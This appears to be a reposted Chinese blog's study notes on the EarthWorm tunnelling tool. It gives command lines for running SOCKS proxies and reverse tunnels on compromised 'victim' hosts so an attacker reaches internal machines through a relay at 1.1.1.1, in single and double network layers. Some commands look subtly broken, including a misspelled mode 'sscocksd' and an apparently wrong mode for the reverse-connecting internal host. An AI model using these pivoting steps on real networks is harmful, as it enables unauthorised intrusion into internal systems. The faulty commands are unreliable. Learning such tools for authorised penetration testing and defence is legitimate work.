0x00简介:
EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。
http://rootkiter.com/EarthWorm/
https://github.com/idlefire/ew
0x01:解读
一、普通网络环境
解析:
外网受害者主机执行 ./ew -s ssocksd -l 8888
攻击主机 通过 代理工具 代理端口 1.1.1.1:8888访问受害主机
解析:
受害者可访问外网主机(1.1.1.1) 执行
./ew -s rcsocks -l 1080 -e 8888
注:是将受害者可访问外网主机的8888端口流量转发到受害者可访问外网主机1080端口上
在内网2.2.2.2 主机中执行./ew -s rcsocks -d 1.1.1.1 -e 8888
攻击者通过访问 1.1.1.1:1080 直接访问到 2.2.2.2
二、二重网络环境
解析:
在内网主机B中执行./ew -s rcsocks -l 9999
在web 主机中执行./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
在攻击机器中代理 2.2.2.2:1080 来访问 2.2.2.3的机器
在web 服务器中执行 ./ew -s lcx_listen -l 1080 -e 8888
在主机B中执行 ./ew -s sscocksd -l 9999
在主机A中执行 ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
在攻击主机中代理1.1.1.1:1080 就可以访问2.2.2.3 主机
文章内容源自:https://github.com/idlefire/ew
本文始发于微信公众号(洛米唯熊):内网穿透神器EW-学习笔记
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论